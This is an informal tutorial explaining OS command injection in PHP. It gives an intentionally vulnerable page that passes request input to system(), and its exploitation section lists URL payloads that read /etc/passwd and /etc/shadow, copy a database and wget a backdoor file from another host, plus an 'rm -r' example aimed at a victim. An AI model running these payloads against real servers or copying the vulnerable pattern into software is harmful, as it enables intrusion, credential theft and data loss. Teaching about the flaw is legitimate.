OS command Injection vulnerabity

0
“OS=Operating System” command injection vulnerability is a high impact vulnerability for server/website.  If any website has OS command injection vulnerability Then a malicious hacker can compromise the website or even the server operating system. If a hacker can detect the vulnerability then he can run any Operating system command. For example, If i run the command “rm -r /var/www”  on my computer then it is going remove “www” but what if i run this command on my victim’s computer ?

How we detect this vulnerability:

Suppose our target address is www.victim.com/vultest/lame.php

And the source code:
<html>
<body>
<title>Vulnerable Page</title>
<p><b>We will test  OS command injection vulnerability against this pages. Actually developer don’t know how serious the code is.</b></p>

<p><b>Output of command:</b></p>
<?
system($_REQUEST[‘cmd’]);
?>

<p><b><i>This is how OS command injection vulnerability works.</i></b></p>

In that page the php code also:

<? system($_REQUEST['cmd']); ?>


(This is white box... Just copy it and paste into a php web page for practice purpose.)

This is the OS injection vulnerability. For this simple mistake anyone can run any os specific command against the server/website.  


So If we run a simple command "ping" :





We get reply on the page (Also other contents). In real world test we may not see the reply but it delay some time(4-10 seconds?). If this is the case then we can run any command "ls" .

If any of these statement in the source code:

Exec
system
passthru
shell_exec
proc_open
pcntl_exec



Then it is highly doubt that the site is vulnerable.


Suppose we don't have source code then how we test? Way is fuzzing(Tools, Manually). Sometime we call it black box testing.

To test it we need to write some code for fuzzing purpose or we can use ready tools which are freely downloadable from internet such as burp suit, wfuzz, vulnerability scanner, manually by your hand etc.  I think you have logic for automated testing otherwise get some "False" result by your lam0 tools...






Exploitation : 


Note: Doing it on localhost


http://localhost/vultest/lame.php?cmd=ls 

It output:


db.php
lame.php
login.php
password.txt
test1


We can run any command:


http://localhost/vultest/lame.php?cmd=cat /etc/passwd
http://localhost/vultest/lame.php?cmd=cat /etc/hosts
http://localhost/vultest/lame.php?cmd=cat /etc/shadow (Require root)
http://localhost/vultest/lame.php?cmd=cp /db/to/mysql /here
http://localhost/vultest/lame.php?cmd=cat wget 192.168.1.212/bacdoor.php

etc.   

I hope i explained it and now we know what is it and how it can be exploited by hackers. But really it is very basic, you need to be more advance.

Let me know(sec00rit3y@gmail.com) if you have any questions.

Good luck !!!